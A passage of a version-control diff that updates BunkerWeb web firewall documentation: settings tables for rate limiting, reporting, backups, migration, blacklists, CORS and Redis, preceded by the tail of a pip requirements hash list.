--hash=sha256:236cace6c1903effd647ed46ce6dd5d76d54985fc36dafc5256032886736c85d \
--hash=sha256:249fbcee0a277c32a3ce36d8e36d50c27c968fdf969e0fbe342658d4e010fbc8 \
--hash=sha256:29d839829209f3c53f004e1de8c3113efce6d98029f044fa5cfee666253ee7e6 \
--hash=sha256:2c8982ee19ccecabbaeac1ba687bfef085a6352a8c64f821ce2f43e6d76a9298 \
--hash=sha256:2f30a5ab8902f93930dc6f627c4dd5da2703333287081c85cace0fc6e21c25af \
--hash=sha256:304e7e2418146ae4d0ef0e9ffa28f881f7874b45b4994cc2279b21b6e7ae50c8 \
--hash=sha256:32e5f3b8e32918bfbdd12eca62e49ab3031125c454b507127ad6ecbd86e62fca \
--hash=sha256:334b79ce9c08f26b4659a53f42892793948a613c46f1b583e985fd5a6bf1c149 \
--hash=sha256:33d19f0cde6838c81acffff25c7708e4adc7dd02896c9ec25c3939b1500a1778 \
--hash=sha256:3799e36d60a35162bb35b2246d8bb012192b7437dff807ef79c14e7352706306 \
--hash=sha256:42be5de7cc8c1edac55db92d82b68dc8e683b204d6f5414c5a51997a323d7081 \
--hash=sha256:44b3267cea873684af022822195298501568ed44d542f9a2d9bebc0212e99069 \
--hash=sha256:458d68d34fb74b906709735c927c029e62f7d06437a98af1b5b6258025223210 \
--hash=sha256:45cc13d398b6359a7708986386f72bd156ae781c3e83a68a6d4cee5af04b1ce9 \
--hash=sha256:4e7eaf9df15423d07b6050fb91f86c66307171b95ea53e2d87a7993b6d02c7f7 \
--hash=sha256:4fad420b14ae1970a1f322e8ae84a1d9d89375eb71e1b504060ab2d1bfe68f3c \
--hash=sha256:504b5116e2bd1821efd815941edff7535e93372a098e156bb9dffde30264e798 \
--hash=sha256:50e7e96a527488334379e05755b210b7da4a60fc5d6481938c1fa053e0c92184 \
--hash=sha256:51d27844763c273a122e08a3e86e7aefa54ee09fb672d96a645ece0454d8425e \
--hash=sha256:5253dcb0bfda7214523de58b002eb0090cb530d7c55993ce5f6d17faf953ece7 \
--hash=sha256:534efd2653ebc4f26fc0e47234e53bf0cb4715bb61f98c64d2774a278b58c846 \
--hash=sha256:560278c9975694e1f0bc50da187abf2cdc1e4890739ea33df2bc4a85eeef143e \
--hash=sha256:571452362d552de508c37191b6abbbb660028b8b418e2d68c20779e0bc8eaaa8 \
--hash=sha256:62b5f7910b639f3c1d122d408421317c351e213ca39c964ad4121f27916631c6 \
--hash=sha256:696639a73ca78a380acfaa0a1f6dd8220616a99074c05bba9ba8bb916914b224 \
--hash=sha256:6ccdeef4584450b6f0bddd5135354908dacad95425fcb629fe36d13e48b60f32 \
--hash=sha256:70364a097437dd0a90b31cd77f09f7387ad9ac60ef57590971f43b7fca3082a5 \
--hash=sha256:7117cb7d6ac7f2e985f3d18aa8a1728864097da1a677ffa69e970ca215baebf1 \
--hash=sha256:7467ad8b0eac0b28e52679e972b9b234b3de0ea5cee12eb50091d2b68145fe36 \
--hash=sha256:7d35d4cc9270944e95f9c88af757b0c9fc43f396917e143a5756608462c5223b \
--hash=sha256:7dda3091838206969c2b286f9832dff41e2da545b99d1cfaea9ebd8584d02708 \
--hash=sha256:853cc36e756ff673bf984e9044ccc8fad60b95a748915dddeab9488aea974c73 \
--hash=sha256:8722f72068b3e1156a4b2e1afde6810f1fc67155a9fa30a4b9d5b4bc46f18fb0 \
--hash=sha256:8c6c71cf92b09e5faa72ea2c68aa1f61c9ce11cb66fdc5069d712f4392ddfd00 \
--hash=sha256:903350bf44d7e4116b4d5898b30b15755d61dcd3161e3413a49c7db76f0bee5a \
--hash=sha256:91b53dea84415e8115506cc62e441a2b54537359c63d856d73cb1abe05af4c9a \
--hash=sha256:951be1eae7b47660412dc4938777a975ebc41936d64e28081bf2e584b47ec246 \
--hash=sha256:972b49f2fe1047b9249c958ec4fa1bdd2cf8ce305dc19d27546d5a38e57732d8 \
--hash=sha256:9a8625849387b9d558d528e263ecc9c0fbde86cfa5c2f0eef43fff480ae24d71 \
--hash=sha256:9cdbb1998da94607d5eec02566b9586f0e70d6438abf1b690261aac0edda7ab6 \
--hash=sha256:9e6d4d6ae1827b2f8c7200aaf7501c37cf3f3896c86a6aaf2566448397c823dd \
--hash=sha256:aab65121229c2ecdf4a31b793d99a6a0501225bd39b616e653c87b219ed34a49 \
--hash=sha256:ab98016541543692a37905871a5ffca59b16e08aacc3d7d10a27297b443f572d \
--hash=sha256:ad45f3bccfcb00868f2871dce02a755529838d2b86163ab8a246115e80cfb7d6 \
--hash=sha256:b43b78f9386d3d932a6ce5af4b45f393d2e93693ee18dc4800d30a8909df700e \
--hash=sha256:b66421f8878a0c82fc0c272a43e2121c8d4c67cb37429b764f0d5ad70b82993b \
--hash=sha256:ba034c8db4b264ef1601eb33cd23d87c5013b8fb48b8161debe2e5d3bd9156b0 \
--hash=sha256:bbdc5db2c98ac2bf1971ffa1410c87ca7a15800415f788971e8ba8520fc0fda9 \
--hash=sha256:bc0db93ad039fc2fe32ccd3dd0e0e70c4f3d6e37ae83f0a487e1aba939bd2fbd \
--hash=sha256:bf7c8ee4861d9ef5b1120abb75846828c811f932d63311596ad25fa168053e00 \
--hash=sha256:bf9596cba92ce7b1fd32c7b07c6e3212c7eed0edc271757e48bfcd2b54646452 \
--hash=sha256:c43395a3b7cc9862801a65c6994678484f186ce13c929abab44fb8a9e473a55a \
--hash=sha256:c46a76a599fcbf95f98755275c5527304cc4f1bb69919434c1e15544d7052910 \
--hash=sha256:ca23b41355ba95929e9505ee04e55495726aa2282003ed9b012d86f857d3e49b \
--hash=sha256:cd832bd9b6120d6074f39bdfbb3c80e416848b07ac72910f1c7f03131a6debc3 \
--hash=sha256:cfa6d61a76c77610ba9274c1a90a453062bdf6887858afbe214d18ad41cf6bde \
--hash=sha256:d8a0f0ab5453e409586b11ebe91c672040bc804ca98d03a656825f7890cbdf88 \
--hash=sha256:e91b1976358e17197157b405cab408a5f4e33310cda211c49fc6da7cffd0b2f0 \
--hash=sha256:ea057306ab469130167014b662643cfaed84651c792948891d003cf0039223a5 \
--hash=sha256:eda3dd46df535da787ffb9036b5140f941ecb91701717df91c9daf64cabef953 \
--hash=sha256:f03b1dbd4d9596dd84955bb40f7d885204d6aac0d56a919bb1e0ff2fb7e1735a \
--hash=sha256:fa9335674d7c819674467c7b46154196c51efbaf5f5715187fd366814ba3fa39
# via mkdocs-material
requests==2.31.0 \
--hash=sha256:58cd2187c01e70e6e26505bca751777aa9f2ee0b7f4300988b709f44e013003f \

@ -552,15 +552,11 @@ STREAM support :x:
The following settings are related to the Limiting requests feature :
| Setting | Default | Context | Multiple | Description |
| ----------------------- | ------- | --------- | -------- | --------------------------------------------------------------------------------------------- |
| `USE_LIMIT_REQ` | `yes` | multisite | no | Activate limit requests feature. |
| `LIMIT_REQ_URL` | `/` | multisite | yes | URL (PCRE regex) where the limit request will be applied or special value / for all requests. |
| `LIMIT_REQ_RATE` | `2r/s` | multisite | yes | Rate to apply to the URL (s for second, m for minute, h for hour and d for day). |
| `USE_LIMIT_CONN` | `yes` | multisite | no | Activate limit connections feature. |
| `LIMIT_CONN_MAX_HTTP1` | `10` | multisite | no | Maximum number of connections per IP when using HTTP/1.X protocol. |
| `LIMIT_CONN_MAX_HTTP2` | `100` | multisite | no | Maximum number of streams per IP when using HTTP/2 protocol. |
| `LIMIT_CONN_MAX_STREAM` | `10` | multisite | no | Maximum number of connections per IP when using stream. |
| Setting | Default | Context | Multiple | Description |
| ---------------- | ------- | --------- | -------- | --------------------------------------------------------------------------------------------- |
| `USE_LIMIT_REQ` | `yes` | multisite | no | Activate limit requests feature. |
| `LIMIT_REQ_URL` | `/` | multisite | yes | URL (PCRE regex) where the limit request will be applied or special value / for all requests. |
| `LIMIT_REQ_RATE` | `2r/s` | multisite | yes | Rate to apply to the URL (s for second, m for minute, h for hour and d for day). |
Please note that you can add different rates for different URLs by adding a number as a suffix to the settings for example : `LIMIT_REQ_URL_1=^/url1$`, `LIMIT_REQ_RATE_1=5r/d`, `LIMIT_REQ_URL_2=^/url2/subdir/.*$`, `LIMIT_REQ_RATE_2=1r/m`, ...
@ -679,19 +675,20 @@ The Reporting plugin provides a comprehensive solution for regular reporting of
**List of settings**
| Setting | Default | Context | Description |
| ------------------------------ | -------- | -------- | ---------------------------------------------------------------------------------------------------------------------------------- |
| `USE_REPORTING_SMTP` | `no` | `global` | Enable sending the report via email. |
| `USE_REPORTING_WEBHOOK` | `no` | `global` | Enable sending the report via webhook. |
| `REPORTING_SCHEDULE` | `weekly` | `global` | The frequency at which reports are sent. |
| `REPORTING_WEBHOOK_URLS` | | `global` | List of webhook URLs to receive the report in Markdown (separated by spaces). |
| `REPORTING_SMTP_EMAILS` | | `global` | List of email addresses to receive the report in HTML format (separated by spaces). |
| `REPORTING_SMTP_HOST` | | `global` | The host server used for SMTP sending. |
| `REPORTING_SMTP_PORT` | `465` | `global` | The port used for SMTP. Please note that there are different standards depending on the type of connection (SSL = 465, TLS = 587). |
| `REPORTING_SMTP_FROM_EMAIL` | | `global` | The email address used as the sender. Note that 2FA must be disabled for this email address. |
| `REPORTING_SMTP_FROM_USER` | | `global` | The user authentication value for sending via the from email address. |
| `REPORTING_SMTP_FROM_PASSWORD` | | `global` | The password authentication value for sending via the from email address. |
| `REPORTING_SMTP_SSL` | `SSL` | `global` | Determine whether or not to use a secure connection for SMTP. |
| Setting | Default | Context | Description |
| ------------------------------ | ------------------ | ------- | ---------------------------------------------------------------------------------------------------------------------------------- |
| `USE_REPORTING_SMTP` | `no` | global | Enable sending the report via email. |
| `USE_REPORTING_WEBHOOK` | `no` | global | Enable sending the report via webhook. |
| `REPORTING_SCHEDULE` | `weekly` | global | The frequency at which reports are sent. |
| `REPORTING_WEBHOOK_URLS` | | global | List of webhook URLs to receive the report in Markdown (separated by spaces). |
| `REPORTING_SMTP_EMAILS` | | global | List of email addresses to receive the report in HTML format (separated by spaces). |
| `REPORTING_SMTP_HOST` | | global | The host server used for SMTP sending. |
| `REPORTING_SMTP_PORT` | `465` | global | The port used for SMTP. Please note that there are different standards depending on the type of connection (SSL = 465, TLS = 587). |
| `REPORTING_SMTP_FROM_EMAIL` | | global | The email address used as the sender. Note that 2FA must be disabled for this email address. |
| `REPORTING_SMTP_FROM_USER` | | global | The user authentication value for sending via the from email address. |
| `REPORTING_SMTP_FROM_PASSWORD` | | global | The password authentication value for sending via the from email address. |
| `REPORTING_SMTP_SSL` | `SSL` | global | Determine whether or not to use a secure connection for SMTP. |
| `REPORTING_SMTP_SUBJECT` | `BunkerWeb Report` | global | The subject line of the email. |
!!! info "Information and behavior"
- case `USE_REPORTING_SMTP` is set to `yes`, the setting `REPORTING_SMTP_EMAILS` must be set.
@ -941,17 +938,18 @@ By activating this feature, you're proactively safeguarding your **data's integr
**List of settings**
| Setting | Default | Context | Description |
| ----------------------------- | ------- | ------- | ------------------------------------------------ |
| `USE_BACKUP_S3` | `no` | global | Enable or disable the S3 backup feature |
| `BACKUP_S3_SCHEDULE` | `daily` | global | Frequency of the backup (daily, weekly, monthly) |
| `BACKUP_S3_ROTATION` | `7` | global | Number of backups to keep |
| `BACKUP_S3_ENDPOINT` | | global | S3 endpoint |
| `BACKUP_S3_BUCKET` | | global | S3 bucket name |
| `BACKUP_S3_REGION` | | global | S3 region |
| `BACKUP_S3_ACCESS_KEY_ID` | | global | S3 access key ID |
| `BACKUP_S3_ACCESS_KEY_SECRET` | | global | S3 access key secret |
| `BACKUP_S3_COMP_LEVEL` | `6` | global | Compression level of the backup zip file (1-9) |
| Setting | Default | Context | Description |
| ----------------------------- | ------- | ------- | -------------------------------------------- |
| `USE_BACKUP_S3` | `no` | global | Enable or disable the S3 backup feature |
| `BACKUP_S3_SCHEDULE` | `daily` | global | The frequency of the backup |
| `BACKUP_S3_ROTATION` | `7` | global | The number of backups to keep |
| `BACKUP_S3_ENDPOINT` | | global | The S3 endpoint |
| `BACKUP_S3_BUCKET` | | global | The S3 bucket |
| `BACKUP_S3_DIR` | | global | The S3 directory |
| `BACKUP_S3_REGION` | | global | The S3 region |
| `BACKUP_S3_ACCESS_KEY_ID` | | global | The S3 access key ID |
| `BACKUP_S3_ACCESS_KEY_SECRET` | | global | The S3 access key secret |
| `BACKUP_S3_COMP_LEVEL` | `6` | global | The compression level of the backup zip file |
#### Manual backup
@ -1067,13 +1065,11 @@ You can also specify a custom backup file for the restore by providing the path
docker exec -it <scheduler_container> bwcli plugin backup_s3 restore
```
## Migration of BunkerWeb
### Migration <img src='../assets/img/pro-icon.svg' alt='crow pro icon' height='24px' width='24px' style="transform : translateY(3px);"> (PRO)
## Migration <img src='../assets/img/pro-icon.svg' alt='crow pro icon' height='24px' width='24px' style="transform : translateY(3px);"> (PRO)
STREAM support :white_check_mark:
The Migration tool **revolutionizes** BunkerWeb configuration transfers between instances with its **user-friendly web interface**, simplifying the entire migration journey. Whether you're upgrading systems, scaling infrastructure, or transitioning environments, this tool empowers you to effortlessly transfer **settings, preferences, and data** with unmatched ease and confidence. Say goodbye to cumbersome manual processes and hello to a **seamless, hassle-free migration experience**.
The Migration plugin **revolutionizes** BunkerWeb configuration transfers between instances with its **user-friendly web interface**, simplifying the entire migration journey. Whether you're upgrading systems, scaling infrastructure, or transitioning environments, this tool empowers you to effortlessly transfer **settings, preferences, and data** with unmatched ease and confidence. Say goodbye to cumbersome manual processes and hello to a **seamless, hassle-free migration experience**.
**List of features**
@ -1083,7 +1079,7 @@ The Migration tool **revolutionizes** BunkerWeb configuration transfers between
- **Cross-Database Compatibility:** Enjoy seamless migration across various database platforms, including SQLite, MySQL, MariaDB, and PostgreSQL, ensuring compatibility with your preferred database environment.
#### Create a migration file
### Create a migration file
To manually create a migration file, execute the following command:
@ -1143,7 +1139,7 @@ This command will create a backup of your database and store it in the backup di
...
```
#### Initialize a migration
### Initialize a migration
To manually initialize a migration, execute the following command:


@ -63,6 +63,8 @@ Bot detection by using a challenge.
|---------------------------|------------|---------|--------|------------------------------------------------------------------------------------------------------------------------------|
|`USE_ANTIBOT` |`no` |multisite|no |Activate antibot feature. |
|`ANTIBOT_URI` |`/challenge`|multisite|no |Unused URI that clients will be redirected to to solve the challenge. |
|`ANTIBOT_TIME_RESOLVE` |`60` |multisite|no |Maximum time (in seconds) clients have to resolve the challenge. Once this time has passed, a new challenge will be generated.|
|`ANTIBOT_TIME_VALID` |`86400` |multisite|no |Maximum validity time of solved challenges. Once this time has passed, clients will need to resolve a new one. |
|`ANTIBOT_RECAPTCHA_SCORE` |`0.7` |multisite|no |Minimum score required for reCAPTCHA challenge. |
|`ANTIBOT_RECAPTCHA_SITEKEY`| |multisite|no |Sitekey for reCAPTCHA challenge. |
|`ANTIBOT_RECAPTCHA_SECRET` | |multisite|no |Secret for reCAPTCHA challenge. |
@ -70,8 +72,6 @@ Bot detection by using a challenge.
|`ANTIBOT_HCAPTCHA_SECRET` | |multisite|no |Secret for hCaptcha challenge. |
|`ANTIBOT_TURNSTILE_SITEKEY`| |multisite|no |Sitekey for Turnstile challenge. |
|`ANTIBOT_TURNSTILE_SECRET` | |multisite|no |Secret for Turnstile challenge. |
|`ANTIBOT_TIME_RESOLVE` |`60` |multisite|no |Maximum time (in seconds) clients have to resolve the challenge. Once this time has passed, a new challenge will be generated.|
|`ANTIBOT_TIME_VALID` |`86400` |multisite|no |Maximum validity time of solved challenges. Once this time has passed, clients will need to resolve a new one. |
## Auth basic
@ -93,12 +93,12 @@ STREAM support :white_check_mark:
Backup your data to a custom location. Ensure the safety and availability of your important files by creating regular backups.
| Setting | Default |Context|Multiple| Description |
|------------------|----------------------------|-------|--------|---------------------------------------------|
|`USE_BACKUP` |`yes` |global |no |Enable or disable the backup feature |
|`BACKUP_DIRECTORY`|`/var/lib/bunkerweb/backups`|global |no |The directory where the backup will be stored|
|`BACKUP_SCHEDULE` |`daily` |global |no |The frequency of the backup |
|`BACKUP_ROTATION` |`7` |global |no |The number of backups to keep |
| Setting | Default |Context|Multiple| Description |
|------------------|----------------------------|-------|--------|------------------------------------------------------|
|`USE_BACKUP` |`yes` |global |no |Enable or disable the backup feature |
|`BACKUP_SCHEDULE` |`daily` |global |no |The frequency of the backup (daily, weekly or monthly)|
|`BACKUP_ROTATION` |`7` |global |no |The number of backups to keep |
|`BACKUP_DIRECTORY`|`/var/lib/bunkerweb/backups`|global |no |The directory where the backup will be stored |
## Backup S3 <img src='../assets/img/pro-icon.svg' alt='crow pro icon' height='24px' width='24px' style='transform : translateY(3px);'> (PRO)
@ -114,6 +114,7 @@ Automatically backup your data to an S3 bucket
|`BACKUP_S3_ROTATION` |`7` |global |no |The number of backups to keep |
|`BACKUP_S3_ENDPOINT` | |global |no |The S3 endpoint |
|`BACKUP_S3_BUCKET` | |global |no |The S3 bucket |
|`BACKUP_S3_DIR` | |global |no |The S3 directory |
|`BACKUP_S3_REGION` | |global |no |The S3 region |
|`BACKUP_S3_ACCESS_KEY_ID` | |global |no |The S3 access key ID |
|`BACKUP_S3_ACCESS_KEY_SECRET`| |global |no |The S3 access key secret |
@ -129,9 +130,9 @@ Ban IP generating too much 'bad' HTTP status code in a period of time.
|---------------------------|-----------------------------|---------|--------|--------------------------------------------------------------------------------------------|
|`USE_BAD_BEHAVIOR` |`yes` |multisite|no |Activate Bad behavior feature. |
|`BAD_BEHAVIOR_STATUS_CODES`|`400 401 403 404 405 429 444`|multisite|no |List of HTTP status codes considered as 'bad'. |
|`BAD_BEHAVIOR_BAN_TIME` |`86400` |multisite|no |The duration time (in seconds) of a ban when the corresponding IP has reached the threshold.|
|`BAD_BEHAVIOR_THRESHOLD` |`10` |multisite|no |Maximum number of 'bad' HTTP status codes within the period of time before IP is banned. |
|`BAD_BEHAVIOR_COUNT_TIME` |`60` |multisite|no |Period of time (in seconds) during which we count 'bad' HTTP status codes. |
|`BAD_BEHAVIOR_BAN_TIME` |`86400` |multisite|no |The duration time (in seconds) of a ban when the corresponding IP has reached the threshold.|
## Blacklist
@ -143,25 +144,25 @@ Deny access based on internal and external IP/network/rDNS/ASN blacklists.
|----------------------------------|------------------------------------------------------------------------------------------------------------------------------|---------|--------|------------------------------------------------------------------------------------------------|
|`USE_BLACKLIST` |`yes` |multisite|no |Activate blacklist feature. |
|`BLACKLIST_IP` | |multisite|no |List of IP/network, separated with spaces, to block. |
|`BLACKLIST_IP_URLS` |`https://www.dan.me.uk/torlist/?exit` |global |no |List of URLs, separated with spaces, containing bad IP/network to block. |
|`BLACKLIST_RDNS_GLOBAL` |`yes` |multisite|no |Only perform RDNS blacklist checks on global IP addresses. |
|`BLACKLIST_RDNS` |`.shodan.io .censys.io` |multisite|no |List of reverse DNS suffixes, separated with spaces, to block. |
|`BLACKLIST_RDNS_URLS` | |global |no |List of URLs, separated with spaces, containing reverse DNS suffixes to block. |
|`BLACKLIST_RDNS_GLOBAL` |`yes` |multisite|no |Only perform RDNS blacklist checks on global IP addresses. |
|`BLACKLIST_ASN` | |multisite|no |List of ASN numbers, separated with spaces, to block. |
|`BLACKLIST_ASN_URLS` | |global |no |List of URLs, separated with spaces, containing ASN to block. |
|`BLACKLIST_USER_AGENT` | |multisite|no |List of User-Agent (PCRE regex), separated with spaces, to block. |
|`BLACKLIST_USER_AGENT_URLS` |`https://raw.githubusercontent.com/mitchellkrogza/nginx-ultimate-bad-bot-blocker/master/_generator_lists/bad-user-agents.list`|global |no |List of URLs, separated with spaces, containing bad User-Agent to block. |
|`BLACKLIST_URI` | |multisite|no |List of URI (PCRE regex), separated with spaces, to block. |
|`BLACKLIST_URI_URLS` | |global |no |List of URLs, separated with spaces, containing bad URI to block. |
|`BLACKLIST_IGNORE_IP` | |multisite|no |List of IP/network, separated with spaces, to ignore in the blacklist. |
|`BLACKLIST_IGNORE_IP_URLS` | |global |no |List of URLs, separated with spaces, containing IP/network to ignore in the blacklist. |
|`BLACKLIST_IGNORE_RDNS` | |multisite|no |List of reverse DNS suffixes, separated with spaces, to ignore in the blacklist. |
|`BLACKLIST_IGNORE_RDNS_URLS` | |global |no |List of URLs, separated with spaces, containing reverse DNS suffixes to ignore in the blacklist.|
|`BLACKLIST_IGNORE_ASN` | |multisite|no |List of ASN numbers, separated with spaces, to ignore in the blacklist. |
|`BLACKLIST_IGNORE_ASN_URLS` | |global |no |List of URLs, separated with spaces, containing ASN to ignore in the blacklist. |
|`BLACKLIST_IGNORE_USER_AGENT` | |multisite|no |List of User-Agent (PCRE regex), separated with spaces, to ignore in the blacklist. |
|`BLACKLIST_IGNORE_USER_AGENT_URLS`| |global |no |List of URLs, separated with spaces, containing User-Agent to ignore in the blacklist. |
|`BLACKLIST_IGNORE_URI` | |multisite|no |List of URI (PCRE regex), separated with spaces, to ignore in the blacklist. |
|`BLACKLIST_IP_URLS` |`https://www.dan.me.uk/torlist/?exit` |global |no |List of URLs, separated with spaces, containing bad IP/network to block. |
|`BLACKLIST_RDNS_URLS` | |global |no |List of URLs, separated with spaces, containing reverse DNS suffixes to block. |
|`BLACKLIST_ASN_URLS` | |global |no |List of URLs, separated with spaces, containing ASN to block. |
|`BLACKLIST_USER_AGENT_URLS` |`https://raw.githubusercontent.com/mitchellkrogza/nginx-ultimate-bad-bot-blocker/master/_generator_lists/bad-user-agents.list`|global |no |List of URLs, separated with spaces, containing bad User-Agent to block. |
|`BLACKLIST_URI_URLS` | |global |no |List of URLs, separated with spaces, containing bad URI to block. |
|`BLACKLIST_IGNORE_IP_URLS` | |global |no |List of URLs, separated with spaces, containing IP/network to ignore in the blacklist. |
|`BLACKLIST_IGNORE_RDNS_URLS` | |global |no |List of URLs, separated with spaces, containing reverse DNS suffixes to ignore in the blacklist.|
|`BLACKLIST_IGNORE_ASN_URLS` | |global |no |List of URLs, separated with spaces, containing ASN to ignore in the blacklist. |
|`BLACKLIST_IGNORE_USER_AGENT_URLS`| |global |no |List of URLs, separated with spaces, containing User-Agent to ignore in the blacklist. |
|`BLACKLIST_IGNORE_URI_URLS` | |global |no |List of URLs, separated with spaces, containing URI to ignore in the blacklist. |
## Brotli
@ -198,14 +199,14 @@ Cross-Origin Resource Sharing.
|------------------------------|------------------------------------------------------------------------------------|---------|--------|-------------------------------------------------------------------|
|`USE_CORS` |`no` |multisite|no |Use CORS |
|`CORS_ALLOW_ORIGIN` |`*` |multisite|no |Allowed origins to make CORS requests : PCRE regex or *. |
|`CORS_ALLOW_METHODS` |`GET, POST, OPTIONS` |multisite|no |Value of the Access-Control-Allow-Methods header. |
|`CORS_ALLOW_HEADERS` |`DNT,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Range`|multisite|no |Value of the Access-Control-Allow-Headers header. |
|`CORS_ALLOW_CREDENTIALS` |`no` |multisite|no |Send the Access-Control-Allow-Credentials header. |
|`CORS_EXPOSE_HEADERS` |`Content-Length,Content-Range` |multisite|no |Value of the Access-Control-Expose-Headers header. |
|`CROSS_ORIGIN_OPENER_POLICY` | |multisite|no |Value for the Cross-Origin-Opener-Policy header. |
|`CROSS_ORIGIN_EMBEDDER_POLICY`| |multisite|no |Value for the Cross-Origin-Embedder-Policy header. |
|`CROSS_ORIGIN_RESOURCE_POLICY`| |multisite|no |Value for the Cross-Origin-Resource-Policy header. |
|`CORS_MAX_AGE` |`86400` |multisite|no |Value of the Access-Control-Max-Age header. |
|`CORS_ALLOW_CREDENTIALS` |`no` |multisite|no |Send the Access-Control-Allow-Credentials header. |
|`CORS_ALLOW_METHODS` |`GET, POST, OPTIONS` |multisite|no |Value of the Access-Control-Allow-Methods header. |
|`CORS_ALLOW_HEADERS` |`DNT,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Range`|multisite|no |Value of the Access-Control-Allow-Headers header. |
|`CORS_DENY_REQUEST` |`yes` |multisite|no |Deny request and don't send it to backend if Origin is not allowed.|
## Client cache
@ -289,15 +290,15 @@ Allow access while keeping security features based on internal and external IP/n
|--------------------------|-------|---------|--------|----------------------------------------------------------------------------------------------|
|`USE_GREYLIST` |`no` |multisite|no |Activate greylist feature. |
|`GREYLIST_IP` | |multisite|no |List of IP/network, separated with spaces, to put into the greylist. |
|`GREYLIST_IP_URLS` | |global |no |List of URLs, separated with spaces, containing good IP/network to put into the greylist. |
|`GREYLIST_RDNS_GLOBAL` |`yes` |multisite|no |Only perform RDNS greylist checks on global IP addresses. |
|`GREYLIST_RDNS` | |multisite|no |List of reverse DNS suffixes, separated with spaces, to put into the greylist. |
|`GREYLIST_RDNS_URLS` | |global |no |List of URLs, separated with spaces, containing reverse DNS suffixes to put into the greylist.|
|`GREYLIST_RDNS_GLOBAL` |`yes` |multisite|no |Only perform RDNS greylist checks on global IP addresses. |
|`GREYLIST_ASN` | |multisite|no |List of ASN numbers, separated with spaces, to put into the greylist. |
|`GREYLIST_ASN_URLS` | |global |no |List of URLs, separated with spaces, containing ASN to put into the greylist. |
|`GREYLIST_USER_AGENT` | |multisite|no |List of User-Agent (PCRE regex), separated with spaces, to put into the greylist. |
|`GREYLIST_USER_AGENT_URLS`| |global |no |List of URLs, separated with spaces, containing good User-Agent to put into the greylist. |
|`GREYLIST_URI` | |multisite|no |List of URI (PCRE regex), separated with spaces, to put into the greylist. |
|`GREYLIST_IP_URLS` | |global |no |List of URLs, separated with spaces, containing good IP/network to put into the greylist. |
|`GREYLIST_RDNS_URLS` | |global |no |List of URLs, separated with spaces, containing reverse DNS suffixes to put into the greylist.|
|`GREYLIST_ASN_URLS` | |global |no |List of URLs, separated with spaces, containing ASN to put into the greylist. |
|`GREYLIST_USER_AGENT_URLS`| |global |no |List of URLs, separated with spaces, containing good User-Agent to put into the greylist. |
|`GREYLIST_URI_URLS` | |global |no |List of URLs, separated with spaces, containing bad URI to put into the greylist. |
## Gzip
@ -312,6 +313,7 @@ Compress HTTP requests with the gzip algorithm.
|`GZIP_TYPES` |`application/atom+xml application/javascript application/json application/rss+xml application/vnd.ms-fontobject application/x-font-opentype application/x-font-truetype application/x-font-ttf application/x-javascript application/xhtml+xml application/xml font/eot font/opentype font/otf font/truetype image/svg+xml image/vnd.microsoft.icon image/x-icon image/x-win-bitmap text/css text/javascript text/plain text/xml`|multisite|no |List of MIME types that will be compressed with gzip.|
|`GZIP_MIN_LENGTH`|`1000` |multisite|no |Minimum length for gzip compression. |
|`GZIP_COMP_LEVEL`|`5` |multisite|no |The compression level of the gzip algorithm. |
|`GZIP_PROXIED` |`no-cache no-store private expired auth` |multisite|no |Which kind of proxied requests we should compress. |
## HTML injection
@ -516,9 +518,9 @@ Get real IP of clients when BunkerWeb is behind a reverse proxy / load balancer.
|`USE_REAL_IP` |`no` |multisite|no |Retrieve the real IP of client. |
|`USE_PROXY_PROTOCOL`|`no` |multisite|no |Enable PROXY protocol communication. |
|`REAL_IP_FROM` |`192.168.0.0/16 172.16.0.0/12 10.0.0.0/8`|multisite|no |List of trusted IPs / networks, separated with spaces, where proxied requests come from. |
|`REAL_IP_FROM_URLS` | |global |no |List of URLs containing trusted IPs / networks, separated with spaces, where proxied requests come from.|
|`REAL_IP_HEADER` |`X-Forwarded-For` |multisite|no |HTTP header containing the real IP or special value proxy_protocol for PROXY protocol. |
|`REAL_IP_RECURSIVE` |`yes` |multisite|no |Perform a recursive search in the header container IP address. |
|`REAL_IP_FROM_URLS` | |global |no |List of URLs containing trusted IPs / networks, separated with spaces, where proxied requests come from.|
## Redirect
@ -547,14 +549,14 @@ Redis server configuration when using BunkerWeb in cluster mode.
|`REDIS_SSL` |`no` |global |no |Use SSL/TLS connection with Redis server. |
|`REDIS_SSL_VERIFY` |`no` |global |no |Verify the certificate of Redis server. |
|`REDIS_TIMEOUT` |`1000` |global |no |Redis server timeout (in ms) for connect, read and write. |
|`REDIS_KEEPALIVE_IDLE` |`30000`|global |no |Max idle time (in ms) before closing redis connection in the pool. |
|`REDIS_KEEPALIVE_POOL` |`10` |global |no |Max number of redis connection(s) kept in the pool. |
|`REDIS_USERNAME` | |global |no |Redis username used in AUTH command. |
|`REDIS_PASSWORD` | |global |no |Redis password used in AUTH command. |
|`REDIS_SENTINEL_HOSTS` | |global |no |Redis sentinel hosts with format host:[port] separated with spaces.|
|`REDIS_SENTINEL_USERNAME`| |global |no |Redis sentinel username. |
|`REDIS_SENTINEL_PASSWORD`| |global |no |Redis sentinel password. |
|`REDIS_SENTINEL_MASTER` | |global |no |Redis sentinel master name. |
|`REDIS_KEEPALIVE_IDLE` |`30000`|global |no |Max idle time (in ms) before closing redis connection in the pool. |
|`REDIS_KEEPALIVE_POOL` |`10` |global |no |Max number of redis connection(s) kept in the pool. |
## Reporting <img src='../assets/img/pro-icon.svg' alt='crow pro icon' height='24px' width='24px' style='transform : translateY(3px);'> (PRO)
@ -563,19 +565,20 @@ STREAM support :x:
Regular reporting of important data from BunkerWeb (global, attacks, bans, requests, reasons, AS...). Monitoring pro plugin needed to work.
| Setting |Default |Context|Multiple| Description |
|------------------------------|--------|-------|--------|----------------------------------------------------------------------------------------------------------------------------------|
|`USE_REPORTING_SMTP` |`no` |global |no |Enable sending the report via email. |
|`USE_REPORTING_WEBHOOK` |`no` |global |no |Enable sending the report via webhook. |
|`REPORTING_SCHEDULE` |`weekly`|global |no |The frequency at which reports are sent. |
|`REPORTING_WEBHOOK_URLS` | |global |no |List of webhook URLs to receive the report in Markdown (separated by spaces). |
|`REPORTING_SMTP_EMAILS` | |global |no |List of email addresses to receive the report in HTML format (separated by spaces). |
|`REPORTING_SMTP_HOST` | |global |no |The host server used for SMTP sending. |
|`REPORTING_SMTP_PORT` |`465` |global |no |The port used for SMTP. Please note that there are different standards depending on the type of connection (SSL = 465, TLS = 587).|
|`REPORTING_SMTP_FROM_EMAIL` | |global |no |The email address used as the sender. Note that 2FA must be disabled for this email address. |
